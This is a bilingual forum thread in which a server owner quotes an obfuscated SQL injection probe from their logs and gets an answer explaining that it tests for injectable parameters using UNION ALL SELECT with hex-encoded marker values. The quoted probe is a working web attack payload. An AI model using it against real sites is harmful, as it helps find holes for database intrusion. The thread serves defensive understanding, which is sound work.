Sql注入可以有人向我解释这段代码

I have been seeing this sql injection/attack on one of my servers and would like to know what it is trying to do. I know it's an attack and after googling it I see it is being used a lot but I do not see an explanation of what its doing and what the hex or binary is. Here is the attack

我一直在我的一台服务器上看到这个SQL注入/攻击,并想知道它想要做什么。我知道这是一次攻击,谷歌搜索后我发现它被大量使用,但我没有看到它的作用以及十六进制或二进制是什么的解释。这是攻击

press-detail.php?id=999999.9+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39,0x393133353134353632392e39,0x39313335313435363231302e39,0x39313335313435363231312e39,0x39313335313435363231322e39,0x39313335313435363231332e39,0x39313335313435363231342e39,0x39313335313435363231352e39,0x39313335313435363231362e39,0x39313335313435363231372e39,0x39313335313435363231382e39,0x39313335313435363231392e39,0x39313335313435363232302e39,0x39313335313435363232312e39,0x39313335313435363232322e39,0x39313335313435363232332e39,0x39313335313435363232342e39,0x39313335313435363232352e39,0x39313335313435363232362e39,0x39313335313435363232372e39,0x39313335313435363232382e39,0x39313335313435363232392e39,0x39313335313435363233302e39,0x39313335313435363233312e39,0x39313335313435363233322e39,0x39313335313435363233332e39,0x39313335313435363233342e39,0x39313335313435363233352e39,0x39313335313435363233362e39,0x39313335313435363233372e39,0x39313335313435363233382e39,0x39313335313435363233392e39,0x39313335313435363234302e39,0x39313335313435363234312e39,0x39313335313435363234322e39,0x39313335313435363234332e39,0x39313335313435363234342e39,0x39313335313435363234352e39,0x39313335313435363234362e39,0x39313335313435363234372e39,0x39313335313435363234382e39,0x39313335313435363234392e39,0x39313335313435363235302e39,0x39313335313435363235312e39,0x39313335313435363235322e39,0x39313335313435363235332e39,0x39313335313435363235342e39,0x39313335313435363235352e39,0x39313335313435363235362e39,0x39313335313435363235372e39,0x39313335313435363235382e39,0x39313335313435363235392e39,0x39313335313435363236302e39,0x39313335313435363236312e39,0x39313335313435363236322e39,0x39313335313435363236332e39,0x39313335313435363236342e39,0x39313335313435363236352e39,0x39313335313435363236362e39,0x39313335313435363236372e39,0x39313335313435363236382e39,0x39313335313435363236392e39,0x39313335313435363237302e39,0x39313335313435363237312e39,0x39313335313435363237322e39,0x39313335313435363237332e39+and+'1'='1

What I would like to know why "999999.9", what is "0x39313335313435363237322e39". When this attack works what information would the hackers have or edits would they have done to the database. Last could this attack run over and over again bring down/crash the server?

我想知道为什么“999999.9”,什么是“0x39313335313435363237322e39”。当这种攻击起作用时,黑客会对数据库进行哪些信息或编辑。最后这次攻击能不能一次又一次地降低/崩溃服务器?

Any explanation of this code would be greatly appreciated.

非常感谢对此代码的任何解释。

1 个解决方案

#1

So, as it's being used a lot, I would submit my answer.

所以,由于它被大量使用,我会提交我的答案。

In my opinion, the aim of these requests is to check the presence or absence of a sql injection. This is the part of the query that is trying to inject:

在我看来,这些请求的目的是检查是否存在sql注入。这是尝试注入的查询的一部分:

999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" and '1'='1

The goal of the attacker is to complete the query in this way:

攻击者的目标是以这种方式完成查询:

SELECT * FROM table WHERE field=999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9"

If field is not sanitized, and only if the number of the columns used in the UNION SELECT match with the columns of the query, most likely will appear the string 91351456272.9 somewhere in the page.

如果字段未清理,并且仅当UNION SELECT中使用的列数与查询列匹配时,很可能在页面中的某处显示字符串91351456272.9。

That will be the confirmed for the attacker of a vulnerability in the page.

这将是攻击者确认页面中的漏洞。

#1